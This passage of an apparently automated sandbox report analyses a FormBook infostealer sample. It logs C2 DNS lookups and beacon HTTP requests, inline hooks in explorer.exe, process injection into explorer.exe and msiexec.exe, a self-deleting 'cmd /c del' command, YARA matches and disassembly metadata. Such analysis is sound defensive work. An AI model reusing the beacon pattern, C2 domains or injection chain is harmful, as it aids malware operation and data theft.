Jan 13, 2021 08:53:13.636240959 CET	53	55708	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 08:51:25.981870890 CET	192.168.2.3	8.8.8.8	0x3fec	Standard query (0)	www.thesaltlifestyle.com	A (IP address)	IN (0x0001)
Jan 13, 2021 08:51:46.852432966 CET	192.168.2.3	8.8.8.8	0x5aad	Standard query (0)	www.aduhelmfinancialsupport.com	A (IP address)	IN (0x0001)
Jan 13, 2021 08:52:09.404354095 CET	192.168.2.3	8.8.8.8	0x70c8	Standard query (0)	www.scientificimaginetics.com	A (IP address)	IN (0x0001)
Jan 13, 2021 08:52:29.502216101 CET	192.168.2.3	8.8.8.8	0x249c	Standard query (0)	www.johnemotions.com	A (IP address)	IN (0x0001)
Jan 13, 2021 08:53:12.572185993 CET	192.168.2.3	8.8.8.8	0x53bf	Standard query (0)	www.steelyourselfshop.net	A (IP address)	IN (0x0001)
Jan 13, 2021 08:53:13.559467077 CET	192.168.2.3	8.8.8.8	0x53bf	Standard query (0)	www.steelyourselfshop.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 08:51:26.053591967 CET	8.8.8.8	192.168.2.3	0x3fec	No error (0)	www.thesaltlifestyle.com	thesaltlifestyle.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 08:51:26.053591967 CET	8.8.8.8	192.168.2.3	0x3fec	No error (0)	thesaltlifestyle.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 08:51:46.924470901 CET	8.8.8.8	192.168.2.3	0x5aad	No error (0)	www.aduhelmfinancialsupport.com		165.160.13.20	A (IP address)	IN (0x0001)
Jan 13, 2021 08:51:46.924470901 CET	8.8.8.8	192.168.2.3	0x5aad	No error (0)	www.aduhelmfinancialsupport.com		165.160.15.20	A (IP address)	IN (0x0001)
Jan 13, 2021 08:52:09.769263029 CET	8.8.8.8	192.168.2.3	0x70c8	No error (0)	www.scientificimaginetics.com		154.92.73.140	A (IP address)	IN (0x0001)
Jan 13, 2021 08:52:29.573985100 CET	8.8.8.8	192.168.2.3	0x249c	No error (0)	www.johnemotions.com		104.24.109.70	A (IP address)	IN (0x0001)
Jan 13, 2021 08:52:29.573985100 CET	8.8.8.8	192.168.2.3	0x249c	No error (0)	www.johnemotions.com		104.24.108.70	A (IP address)	IN (0x0001)
Jan 13, 2021 08:52:29.573985100 CET	8.8.8.8	192.168.2.3	0x249c	No error (0)	www.johnemotions.com		172.67.142.17	A (IP address)	IN (0x0001)
Jan 13, 2021 08:53:13.636240959 CET	8.8.8.8	192.168.2.3	0x53bf	Name error (3)	www.steelyourselfshop.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.thesaltlifestyle.com

www.aduhelmfinancialsupport.com

www.scientificimaginetics.com

www.johnemotions.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49736	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 08:51:26.099952936 CET	4471	OUT	GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct HTTP/1.1 Host: www.thesaltlifestyle.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 08:51:26.238513947 CET	4471	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 07:51:26 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc83a1-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49737	165.160.13.20	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 08:51:47.060177088 CET	4473	OUT	GET /p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1 Host: www.aduhelmfinancialsupport.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 08:51:47.204091072 CET	4473	IN	HTTP/1.1 200 OK Connection: close Date: Wed, 13 Jan 2021 07:51:47 GMT Content-Length: 94 X-ORACLE-DMS-ECID: ea9850e1-3635-4b18-92ae-e9076c77ad59-6e5b326b X-ORACLE-DMS-RID: 0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49740	154.92.73.140	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 08:52:10.069588900 CET	4493	OUT	GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8 HTTP/1.1 Host: www.scientificimaginetics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 08:52:10.370596886 CET	4493	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Jan 2021 07:52:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49741	104.24.109.70	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 08:52:29.626843929 CET	4494	OUT	GET /p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1 Host: www.johnemotions.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 08:52:29.685899973 CET	4495	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Jan 2021 07:52:29 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 13 Jan 2021 08:52:29 GMT Location: https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1 cf-request-id: 079c546cdf000041322a3d0000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=w99moivZwEdAiIc2yCtyAR0%2FANulYBqCpqCigrLpA%2FwtpANEJ0cKyvXA4kjcxYCQ9OtB5r2vufT9lf7t3ldGfJSk%2FfyPl3EDh5LIQKte1lnEAUpIaQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 610d89c169fc4132-PRG Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xEA
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xEA
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xEA
GetMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xEA

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Po-covid19 2372#w2..exe PID: 5532 Parent PID: 5604

General

Start time:	08:50:13
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\Po-covid19 2372#w2..exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
Imagebase:	0x70000
File size:	1304576 bytes
MD5 hash:	BF53C9DC0D0F032033C318ACEEF906C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.253062095.0000000002708000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: Po-covid19 2372#w2..exe PID: 4308 Parent PID: 5532

General

Start time:	08:50:26
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\Po-covid19 2372#w2..exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x130000
File size:	1304576 bytes
MD5 hash:	BF53C9DC0D0F032033C318ACEEF906C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Po-covid19 2372#w2..exe PID: 5404 Parent PID: 5532

General

Start time:	08:50:27
Start date:	13/01/2021
Path:	C:\Users\user\Desktop\Po-covid19 2372#w2..exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x9b0000
File size:	1304576 bytes
MD5 hash:	BF53C9DC0D0F032033C318ACEEF906C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 5404

General

Start time:	08:50:31
Start date:	13/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 6748 Parent PID: 3388

General

Start time:	08:50:47
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msiexec.exe
Imagebase:	0xbf0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7092 Parent PID: 6748

General

Start time:	08:50:52
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
Imagebase:	0xbf0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7100 Parent PID: 7092

General

Start time:	08:50:53
Start date:	13/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Po-covid19 2372#w2..exe PID: 5532 Parent PID: 5604 Po-covid19 2372#w2..exeCOMMON

Executed Functions

Function 04BB058F, Relevance: 10.8, Strings: 8, Instructions: 802COMMON

Download Yara Rule

Strings

a, xrefs: 04BB101F
6, xrefs: 04BB088B
4, xrefs: 04BB0D66
(, xrefs: 04BB0F07
f, xrefs: 04BB1349
h, xrefs: 04BB099B
c7h, xrefs: 04BB0DA6
i, xrefs: 04BB0B6D

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID:
String ID: ($4$6$a$c7h$f$h$i
API String ID: 0-1340344980
Opcode ID: 11fa5513ae149efb8c89b24f37893f66ae6f487b43ded4d41b837aa119f95fff
Instruction ID: 48fd988cefeefc407e17bcac1c5657cddfefa536a8f236d5d96079f7d9f56da5
Opcode Fuzzy Hash: 11fa5513ae149efb8c89b24f37893f66ae6f487b43ded4d41b837aa119f95fff
Instruction Fuzzy Hash: D572F474E06229CFDB64DF68C8547FDB6B5AB49304F1091E9C08DA7291EBB46AC4DF80

Uniqueness

Uniqueness Score: -1.00%

Function 04BB06B0, Relevance: 10.7, Strings: 8, Instructions: 682COMMON

Download Yara Rule

Strings

a, xrefs: 04BB101F
6, xrefs: 04BB088B
4, xrefs: 04BB0D66
(, xrefs: 04BB0F07
f, xrefs: 04BB1349
h, xrefs: 04BB099B
c7h, xrefs: 04BB0DA6
i, xrefs: 04BB0B6D

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID:
String ID: ($4$6$a$c7h$f$h$i
API String ID: 0-1340344980
Opcode ID: 0f723cc3782cb9b5b6cffc04ec4168d03bd821b4d1e84201bc55623b1d27b716
Instruction ID: 028cfb6dc5fc96f993184f9923285dd614beb918fc37564cfe00dc2115164cb7
Opcode Fuzzy Hash: 0f723cc3782cb9b5b6cffc04ec4168d03bd821b4d1e84201bc55623b1d27b716
Instruction Fuzzy Hash: F162F374E06229CFDB64DF68C8547FDB6B5AB49304F1091E9C08DA7291EBB46AC4DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0E78, Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

Lp~Y, xrefs: 00BC0F89

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID: Lp~Y
API String ID: 0-125627873
Opcode ID: 13f77b9709b2e7b5afd9253a9d007ca27764fdfe9b0ed78aa90213d74707989a
Instruction ID: 0e6b7283456151de325e3b80d02f005f4088e42499e781b14004050a4f50ef51
Opcode Fuzzy Hash: 13f77b9709b2e7b5afd9253a9d007ca27764fdfe9b0ed78aa90213d74707989a
Instruction Fuzzy Hash: A4A11475E05209CFCB04DFE9D984ADEBBF2EF89300F14806AD915AB355E73099428F61

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0EF8, Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

Lp~Y, xrefs: 00BC0F89

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID: Lp~Y
API String ID: 0-125627873
Opcode ID: cbf2cac287d9bc60ac9a5585796eb31c9171a8c4a1e0cb92951bdcc3213a2d8e
Instruction ID: ce202d823797cb6cd7cb6aa5c15650edd3f96b28109e7f2e9a5b330658f2263b
Opcode Fuzzy Hash: cbf2cac287d9bc60ac9a5585796eb31c9171a8c4a1e0cb92951bdcc3213a2d8e
Instruction Fuzzy Hash: CF81C274E052098FCB18CFE9C984AEEBBF6AF89300F24856AD515BB254D7349942CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00BC1770, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

', xrefs: 00BC17ED

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID: '
API String ID: 0-3467755014
Opcode ID: 6cfe9754d3b50a64cb292c54040fb7d3fc62e0ea07d3da3f4747b344345cfd6a
Instruction ID: 98108b9d118111e4590991f4072e8b963d6e5e1bc89bd5c1ea4183b1029b280a
Opcode Fuzzy Hash: 6cfe9754d3b50a64cb292c54040fb7d3fc62e0ea07d3da3f4747b344345cfd6a
Instruction Fuzzy Hash: 41512AB4E0520A8FCB08CFAAC580AAEFBF2FF89301F24C46AD415B7255D7344A428F55

Uniqueness

Uniqueness Score: -1.00%

Function 04BB2668, Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe48f157adc23dc01ad219c1cda8b74c9da99ef883e4384efcd306e9d04e43d
Instruction ID: 7d838388e6fffe577954a9f0561aef982e5a084610b9f195a342c54b4028be41
Opcode Fuzzy Hash: 8fe48f157adc23dc01ad219c1cda8b74c9da99ef883e4384efcd306e9d04e43d
Instruction Fuzzy Hash: 35C1BD717102008FEB19DB7AC8547BE73E6AF89705F1484ADD58ACB290DB74E902CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC21D9, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148df1b952375f119eb35052b48011bc0a0b7c92ecfa1ec6cd0819f295483d78
Instruction ID: 799cab0c7831c0bf48297c09d15adb95d1fc6b56a95ab495154ba8ec816b9a04
Opcode Fuzzy Hash: 148df1b952375f119eb35052b48011bc0a0b7c92ecfa1ec6cd0819f295483d78
Instruction Fuzzy Hash: F7211971E046188BDB18CFAAD8547DEFBF3AFC9310F14C16AD408AA264DB740955CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00BC0470, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3208e39099951bf02dfde3c4231f7015b0d2c54aeac8f4b74e80821c8a3cca4d
Instruction ID: c437435b26c79683e66aafa8bd986f6a83a2a7a49a605713c233f8f313aaca4c
Opcode Fuzzy Hash: 3208e39099951bf02dfde3c4231f7015b0d2c54aeac8f4b74e80821c8a3cca4d
Instruction Fuzzy Hash: 3821FD71E056199BEB58CFABDC407DEBBF3AFC8300F14C1AAC408A6214DB3045428F51

Uniqueness

Uniqueness Score: -1.00%

Function 04BB2110, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04BB21B3

Strings

nU, xrefs: 04BB2114

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: MessagePost
String ID: nU
API String ID: 410705778-1068464785
Opcode ID: d9a77eaea5fc908c852bd854d3f38d6a54eb6a2ab87586e80b5dd8557d472d46
Instruction ID: 73ecb775570e331ccf73eae81001734aaba772901ab39fcf8ac26eaf53978b39
Opcode Fuzzy Hash: d9a77eaea5fc908c852bd854d3f38d6a54eb6a2ab87586e80b5dd8557d472d46
Instruction Fuzzy Hash: AA3199B9D052089FCB14CFA9E984ADEFBF0EB49310F14905AE814BB310D375A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04BB1580, Relevance: 1.7, APIs: 1, Instructions: 236processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04BB1784

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b270d9f5e4f4f7d09d15f07f08a3cc766ebd56b62ec92b09bd5334fc7aba95e9
Instruction ID: 64042ebea6b9de4944ab52f3f7985358111b27751a28f07f3e4a1214c06312e6
Opcode Fuzzy Hash: b270d9f5e4f4f7d09d15f07f08a3cc766ebd56b62ec92b09bd5334fc7aba95e9
Instruction Fuzzy Hash: 9591F371D00229CFDB21CFA9C984BEDBBB5BF05304F1491AAD509B7260DB70AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0974E030, Relevance: 1.7, Strings: 1, Instructions: 485COMMON

Download Yara Rule

Strings

c7zd^, xrefs: 0974E0B1

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID: c7zd^
API String ID: 0-686892309
Opcode ID: 9de88e129bbba3b91104f44aaf5c0ae21ec87267e0e373285d6393d52105d944
Instruction ID: 66ea5ef98cd4809d210e875b832acc383265a8452445ef899e35ab1f95add379
Opcode Fuzzy Hash: 9de88e129bbba3b91104f44aaf5c0ae21ec87267e0e373285d6393d52105d944
Instruction Fuzzy Hash: F3225CB1906B428BD7745B64968879EB690BF06330F204D5FD0FBCA35AF7349086CB86

Uniqueness

Uniqueness Score: -1.00%

Function 04BB15A8, Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04BB1784

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 910589b806e009fad1db33b5b4036a9f2c56453f59be9b243d422688cb46f9d2
Instruction ID: bcc2b785cbb97f1c331872a55a23569cb5f70c0307fa8dd6bff154b94d781b63
Opcode Fuzzy Hash: 910589b806e009fad1db33b5b4036a9f2c56453f59be9b243d422688cb46f9d2
Instruction Fuzzy Hash: C581F375C0022DCFDF20CFA8C944BEDBBB5AB09304F1091AAE509B7260DB70AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBDB8, Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00BCD729

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 937bfd3a33143860a43f0c2c1c4fab42ef671d604af96b90850983803eaedb86
Instruction ID: 33f3a262b2989ec38f88da7ab21458144f3452d12c646699e84c42fd701fd853
Opcode Fuzzy Hash: 937bfd3a33143860a43f0c2c1c4fab42ef671d604af96b90850983803eaedb86
Instruction Fuzzy Hash: 0751F075D0061C8FDB20CFA4C984BDEBBF5AB49304F2080AAD109AB250DB716E89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04BB1C19, Relevance: 1.6, APIs: 1, Instructions: 126injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04BB1CF6

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b414bd7cc980b1daf4e468be3694d3a4afa39e0ec6718c5f8bddece5f4d0cd79
Instruction ID: ea041db0ddd5b6e0d7293b04b12688f702b5c83b15111f6c3995d65ecec229a4
Opcode Fuzzy Hash: b414bd7cc980b1daf4e468be3694d3a4afa39e0ec6718c5f8bddece5f4d0cd79
Instruction Fuzzy Hash: 4141ECB5D052589FCB00CFA9D884AEEBBF4FB09314F24906AE815BB310D774AA45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04BB1C20, Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04BB1CF6

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3ca8c442db253cedb958e4d48bb23542f711ca0fe7ffa6a31d29409499e57445
Instruction ID: 7e00ab9b21279b434fa0471ca00107d3954492fa6bbc6f689ec404d5bc47e1e6
